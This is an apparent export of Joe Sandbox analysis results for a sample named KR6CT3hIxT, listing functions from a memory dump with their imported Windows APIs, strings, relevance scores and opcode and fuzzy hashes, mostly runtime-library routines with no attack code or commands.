Function 00007FF7E1DF3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7E1DF4767), ref: 00007FF7E1DF3F91
WideCharToMultiByte.KERNEL32 ref: 00007FF7E1DF406D
WriteFile.KERNEL32 ref: 00007FF7E1DF4093
WriteFile.KERNEL32 ref: 00007FF7E1DF40D2
GetLastError.KERNEL32 ref: 00007FF7E1DF410A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction ID: 51e681f7ef8905c382aa0965d5f893bfcf99fb853839cd23eee616f32f1837aa
Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction Fuzzy Hash: 7E512432B14A5189E721DF25D4413ACBBB0FB48798F448236DE4E47B98CF78D2A5C321

Function 00007FF7E1DE1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E1DC4DF4), ref: 00007FF7E1DE1E87
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E1DC4DF4), ref: 00007FF7E1DE1F09
SysAllocString.OLEAUT32 ref: 00007FF7E1DE1F16

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
Instruction ID: c1d40dde3edc4098f411bbd20d3411d329706bd0278b55c5dafcc857a985040e
Opcode Fuzzy Hash: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
Instruction Fuzzy Hash: FC41F832F0864685EB18EF219442378A290FF08BA5F948636EA6DC77D5DFBCD1518363

Function 00007FF7E1DEF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7E1DEF536

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction ID: 2e50ba05b0bb382185740808d65f20a19fa8386f393f9b1fde8b80d2f23a8a16
Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction Fuzzy Hash: A741F921F19A4281FB19EF12A8157B5A395BF14BD1F898537DD1D8B744EEBCE4408322

Function 00007FF7E1DF56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7E1DF56FF
_set_statfp.LIBCMT ref: 00007FF7E1DF571A
_set_statfp.LIBCMT ref: 00007FF7E1DF5736
_set_statfp.LIBCMT ref: 00007FF7E1DF5772

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: 153e2ef5d80bc453189b17167fb39914e5edf52445b1d55b81b932bcf84b5435
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: D911B2F6E5CA0781FB54B124E54737985417F4D3A0EC88232EA7E065DECEFCA6608227

Function 00007FF7E1DDFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF7E1DDFE41
GetMessageW.USER32 ref: 00007FF7E1DDFE58
TranslateMessage.USER32 ref: 00007FF7E1DDFE63
DispatchMessageW.USER32 ref: 00007FF7E1DDFE6E
WaitForSingleObject.KERNEL32 ref: 00007FF7E1DDFE7C

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction ID: e60366979cf0e94aa49be5e47b7d5b52a754647f2652ac04de9c076591f44f01
Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction Fuzzy Hash: 59F06221B3855682F710A720E45ABB6A251FFE4B05FC41131F98E41894DE7CD149C721

Function 00007FF7E1DE625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E1DE6286
abort.LIBCMT ref: 00007FF7E1DE64EA

Strings

csm, xrefs: 00007FF7E1DE641A
csm, xrefs: 00007FF7E1DE62AB

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction ID: 3eb6b6548b0ee423cea802b3e414a597f236beb52ad55cd8b840535991f128e1
Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction Fuzzy Hash: 8F71D27290868186D768EF21D09137DFBA1EB00B8AF84C137DA5CC7A89CB7CD490C752

Function 00007FF7E1DE80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DE811B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DE82ED

Strings

, xrefs: 00007FF7E1DE8276
*, xrefs: 00007FF7E1DE8221

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction ID: 4e01ff9cadf81d37ac1c93c149de263f5b3afa13125d1c73555b6d31e41edd4c
Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction Fuzzy Hash: 75516972D0CA428AE76DEF28848637C77A0FB05B1AF949137C64981199DFBCD4D1C626

Function 00007FF7E1DF1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7E1DF17CB
MultiByteToWideChar.KERNEL32 ref: 00007FF7E1DF1894
GetStringTypeW.KERNEL32 ref: 00007FF7E1DF18AE

Strings

$%s, xrefs: 00007FF7E1DF175A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction ID: c2bb7cd70e97231031d65fbdc7760252d17d50bd5bd99b4c65128335fb51135a
Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction Fuzzy Hash: 4E41D832B04B819AEF14DF26D9013A8A391FB48BA8F884236DE1D477C9DFBCE5518351

Function 00007FF7E1DE66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DE5210: abort.LIBCMT ref: 00007FF7E1DE5223

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E1DE674A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF7E1DE6776

Strings

csm, xrefs: 00007FF7E1DE6876

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: ac8fbf3ec462e2145be73d26481b94e2ea2977e5219d2557d8e2686132098534
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: 42519E76A1874187DB64EB15E18236EB7A4FB88BA1F804136EB8D87B41CF7CD050CB11

Function 00007FF7E1DF4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7E1DF4446
WriteFile.KERNEL32 ref: 00007FF7E1DF4479
GetLastError.KERNEL32 ref: 00007FF7E1DF449B

Strings

U, xrefs: 00007FF7E1DF4424

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction ID: d4b04156731fa64aa00ee992c11f01b0825403d415c134550cf4f3561cc015f0
Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction Fuzzy Hash: BF410822B18A8182D721DF25E8453B9B7A0FB88794F844032EE4D87B48DFBCD551C711

Function 00007FF7E1DD90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7E1DD90D9
GetObjectW.GDI32 ref: 00007FF7E1DD9107
ReleaseDC.USER32 ref: 00007FF7E1DD91BB

Strings

, xrefs: 00007FF7E1DD9153

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction ID: ea188322775b2a6ef09a1cc3cf7f86b90375112bacd52787055dbcd873b8f63e
Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction Fuzzy Hash: 0631173570874286EB04EF12B81972AB7A0F789FD2F814476FD8A43B54CE7CE4498B10

Function 00007FF7E1DCE870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF7E1DD317F,?,?,00001000,00007FF7E1DBE51D), ref: 00007FF7E1DCE8BB
CreateSemaphoreW.KERNEL32(?,?,?,00007FF7E1DD317F,?,?,00001000,00007FF7E1DBE51D), ref: 00007FF7E1DCE8CB
CreateEventW.KERNEL32(?,?,?,00007FF7E1DD317F,?,?,00001000,00007FF7E1DBE51D), ref: 00007FF7E1DCE8E4

Strings

Thread pool initialization failed., xrefs: 00007FF7E1DCE900

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction ID: ea35e65115aee546fcc256de5f1adb66b047d7c54fd39dd86340feb5ce66de24
Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction Fuzzy Hash: 76210872F1564186F710DF24D4467BD7692FFC8B08F588536CA0D0A294CFBE9455C7A2

Function 00007FF7E1DD85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7E1DD85EC
GetDeviceCaps.GDI32 ref: 00007FF7E1DD85FD
ReleaseDC.USER32 ref: 00007FF7E1DD860A

Strings

, xrefs: 00007FF7E1DD8610

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction ID: 4a6628df8858c1ed515a5387265bca992f9f518626ccc9c2a284925ef7e2aa25
Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction Fuzzy Hash: 48E0C220B0864186FB0867B6B59A23EA261AB4CFD1F568036FA5F43794CE7CC4C48310

Function 00007FF7E1DBD1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32 ref: 00007FF7E1DBD46C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBD554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBD55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBD560

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileTime
String ID:
API String ID: 1137671866-0
Opcode ID: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
Instruction ID: 7fbf3de8c0db2bf8f78b7e027e3909769f94c532505eee317ade9ef0052019b9
Opcode Fuzzy Hash: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
Instruction Fuzzy Hash: A8A1E622A18A8291EB10EB65D4427EDA371FF85798FC04533EA8E03AD9DFBCE544C311

Function 00007FF7E1DD0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7E1DD05FC
SetLastError.KERNEL32 ref: 00007FF7E1DD0697

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
Instruction ID: a6183168362d61935950c6213dac6878d252f7af5ba5551481e0f0e8f32ac0fd
Opcode Fuzzy Hash: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
Instruction Fuzzy Hash: 4E51D472F14A4695FB00EB64D4463EC6321EBC8B98FC04633DA0D57799DEB8D544C362

Function 00007FF7E1DD9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7E1DD9DBC
GetLastError.KERNEL32 ref: 00007FF7E1DD9E08
CreateDirectoryW.KERNEL32 ref: 00007FF7E1DD9F10
LocalFree.KERNEL32 ref: 00007FF7E1DD9F20

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
Instruction ID: 45c3e6c00d5f3dce04b19667af58279d67dd3c3e951f4730bbbb2083b6bac244
Opcode Fuzzy Hash: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
Instruction Fuzzy Hash: 8D51C032B18B4286EB00DF21E4457AEB3B4FB88B84F901136EA8E57A58DF7DD544CB11

